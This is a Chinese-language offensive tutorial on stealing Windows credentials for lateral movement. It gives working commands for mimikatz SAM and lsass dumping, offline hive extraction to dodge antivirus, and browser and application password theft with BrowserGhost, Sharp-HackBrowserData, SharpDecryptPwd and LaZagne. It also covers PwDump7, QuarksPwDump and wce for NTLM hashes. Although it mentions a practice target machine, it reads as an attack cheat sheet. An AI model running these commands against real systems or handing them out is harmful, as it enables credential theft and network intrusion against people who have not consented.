Mimikatz在线读取SAM文件
离线读取SAM文件
在线读取lsass进程
离线读取lsass进程
BrowserGhost浏览器密码抓取
Sharp-HackBrowserData浏览器密码抓取
SharpDecryptPwd数据库密码抓取
LaZagne各类密码的抓取
Windows其他类型抓NTLM Hash工具
sam文件和lsass进程就是Windows存储本地密码的文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向
Mimikatz在线读取SAM文件:
首先上传工具
命令框输入:
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
即可得到其他用户的NTLM Hash值和SID
离线读取SAM文件:
防止上传的工具被杀毒软件杀掉
1.先导出sam文件和system文件
2.将sam文件和system文件导出到本地
3.打开mimikatz读取SAM文件和system文件获取密码:
在线读取lsass进程:
上传工具mimikatz
命令:mimikatz sekurlsa::logonPasswords
得到用户的Hash 密码
离线读取lsass进程:
1.查看进程:
2.使用powershell导出进程:
然后将其导出到本地
mimikatz读取:
BrowserGhost浏览器抓取:只能抓谷歌
先上传工具,再抓取密码
命令:BrowserGhost.exe
因为靶机没有谷歌浏览器,所以不能抓到密码
Sharp-HackBrowserData浏览器抓取:
可以抓取微软,谷歌,Edge等等浏览器
先上传工具,再抓取密码
命令:Sharp-HackBrowserData.exe
SharpDecryptPwd数据库密码抓取:
基本用法:
SharpDecryptPwd.exe -NavicatCrypto
SharpDecryptPwd.exe -TeamViewer
SharpDecryptPwd.exe -FileZilla
SharpDecryptPwd.exe -WinSCP
SharpDecryptPwd.exe -Xmangager -p Session_Path (-s UserSid)
SharpDecryptPwd.exe -Browser
命令:SharpDecryptPwd.exe -NavicatCrypto
靶机没有数据库,所有抓不到密码
LaZagne各类密码的抓取:
上传工具,执行命令
命令:laZagne.exe all
可以抓取到wifi密码等等
Windows其他类型抓NTLM Hash工具
1.pwdump7
在命令行环境中运行PwDump7程序,可以得到系统中所有账户的NTLMHash
命令:PwDump7.exe
2.QuarksPwDump:
下载QuarksPwDump.exe,在命令行环境中输人
命令:QuarksPwDump.exe --dump-hash-local 导出三个用户的NLMHash
3.wce:这款工具是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。这款工具也分为32位和64位两个不同的版本
命令 : wce.exe